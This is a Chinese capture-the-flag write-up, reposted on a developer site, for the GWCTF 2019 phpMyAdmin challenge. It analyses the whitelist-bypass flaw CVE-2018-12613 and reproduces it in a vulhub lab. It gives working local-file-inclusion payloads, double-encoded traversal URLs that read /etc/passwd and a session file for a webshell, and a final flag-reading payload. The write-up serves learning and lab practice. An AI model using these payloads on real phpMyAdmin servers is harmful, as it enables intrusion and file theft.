| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> [GWCTF 2019]我有一个数据库 wp -> 正文阅读 |
|
[PHP知识库][GWCTF 2019]我有一个数据库 wp |
打开题目看到的是乱码,想到可能是还有其他的路径,就用dirsearch扫一下 得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'import.php', 'export.php' ); 设置黑名单,过滤'import.php', 'export.php' && is_string($_REQUEST['target']) 需要是字符串 && ! preg_match('/^index/', $_REQUEST['target']) 不能以index开头 && ! in_array($_REQUEST['target'], $target_blacklist) 黑名单 && Core::checkPageValidity($_REQUEST['target']) 白名单过滤 Core::checkPageValidity方法位于libraries/classes/Core.php中443行,此函数作用为: $whitelist 为空就引用申明的 $goto_whitelist; 判断?前面的内容是否在白名单中,是则返回true。但是函数并没有对输入的参数做修改,截取的结果都保存在$_page中,所以target只需前面为 出现问题的代码: $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } 在看看白名单 self::$goto_whitelist 所以可以在白名单?后面的参数进行操作 例如传入: 漏洞复现首先用 vulhub去复现漏洞??? cd vulhub/phpmyadmin/CVE-2018-12613 利用docker-compose up -d 搭建环境 192.168.0.33:8080??target=db_sql.php%253f/../../../../../../../../etc/passwd 可见/etc/passwd被读取,说明文件包含漏洞存在 通过文件包含获取webshell 然后查看自己的sessionid(cookie中phpMyAdmin的值) 然后访问http://192.168.0.33:8080/?target=db_sql.php%253f/../../../../../../../../tmp/sess_9ddf5eb053ac119eb10c2838eb331f1b包含session文件即可 下面回到题目 可以用类似192.168.0.33:8080??target=db_sql.php%253f/../../../../../../../../etc/passwd的方法读取flag payload: phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag ? ? ? ? |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/23 7:26:34- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |